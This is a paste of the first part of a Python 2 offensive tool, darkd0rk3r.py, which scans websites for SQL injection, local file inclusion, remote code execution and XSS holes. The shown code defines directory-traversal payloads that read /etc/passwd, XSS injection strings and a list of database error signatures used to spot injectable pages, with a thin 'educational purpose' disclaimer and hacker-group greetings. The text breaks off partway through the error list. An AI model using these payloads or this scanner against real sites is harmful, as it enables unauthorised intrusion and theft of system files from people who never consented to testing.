SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | # This was written for educational purpose and pentest only. Use it at your own risk. | |
3 | # Author will be not responsible for any damage! | |
4 | # !!! Special greetz for my friend sinner_01 !!! | |
5 | # Toolname : darkd0rk3r.py | |
6 | # Coder : R00Tc0d3r < <71gre> tigerlulz@gmx.com> | |
7 | # Version : 0.7 | |
8 | # Greetz for rsauron and low1z, great python coders | |
9 | # greetz for L33TCr3w , 8lulzsec | |
10 | # | |
11 | ||
12 | import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess | |
13 | from random import choice | |
14 | ||
15 | # Colours | |
16 | W = "\033[0m"; | |
17 | R = "\033[31m"; | |
18 | G = "\033[32m"; | |
19 | O = "\033[33m"; | |
20 | B = "\033[34m"; | |
21 | ||
22 | ||
23 | # Banner | |
24 | def logo(): | |
25 | print R+"\n|---------------------------------------------------------------|" | |
26 | print "| R00Tc0d3r[@]hotmail[dot]com |" | |
27 | print "| 02/2012 darkd0rk3r.py v.0.7 |" | |
28 | print "| R00Tc0d3r |" | |
29 | print "| |" | |
30 | print "|---------------------------------------------------------------|\n" | |
31 | print W | |
32 | ||
33 | if sys.platform == 'linux' or sys.platform == 'linux2': | |
34 | subprocess.call("clear", shell=True) | |
35 | logo() | |
36 | ||
37 | else: | |
38 | subprocess.call("cls", shell=True) | |
39 | logo() | |
40 | ||
41 | log = "darkd0rk3r-sqli.txt" | |
42 | logfile = open(log, "a") | |
43 | lfi_log = "darkd0rk3r-lfi.txt" | |
44 | lfi_log_file = open(lfi_log, "a") | |
45 | rce_log = "darkd0rk3r-rce.txt" | |
46 | rce_log_file = open(rce_log, "a") | |
47 | xss_log = "darkd0rk3r-xss.txt" | |
48 | xss_log_file = open(xss_log, "a") | |
49 | ||
50 | threads = [] | |
51 | finallist = [] | |
52 | vuln = [] | |
53 | timeout = 300 | |
54 | socket.setdefaulttimeout(timeout) | |
55 | ||
56 | ||
57 | ||
58 | ||
59 | lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"] | |
60 | ||
61 | xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"] | |
62 | ||
63 | sqlerrors = {'MySQL': 'error in your SQL syntax', | |
64 | 'MiscError': 'mysql_fetch', | |
65 | 'MiscError2': 'num_rows', | |
66 | 'Oracle': 'ORA-01756', | |
67 | 'JDBC_CFM': 'Error Executing Database Query', | |
68 | 'JDBC_CFM2': 'SQLServer JDBC Driver', | |
69 | 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', | |
70 | 'MSSQL_Uqm': 'Unclosed quotation mark', | |
71 | 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', | |
72 | 'MS-Access_JETdb': 'Microsoft JET Database', | |
73 | 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', | |
74 | 'Server Error' : 'Server Error', | |
75 | 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', | |
76 | 'Invalid Querystring' : 'Invalid Querystring', | |
77 | 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', | |
78 | 'VBScript Runtime' : 'VBScript Runtime', | |
79 | 'ADODB.Field' : 'ADODB.Field', | |
80 | 'BOF or EOF' : 'BOF or EOF', | |
81 | 'ADODB.Command' : 'ADODB.Command', | |
82 | 'JET Database' : 'JET Database', | |
83 | 'mysql_fetch_array()' : 'mysql_fetch_array()', | |
84 | 'Syntax error' : 'Syntax error', | |
85 | 'mysql_ |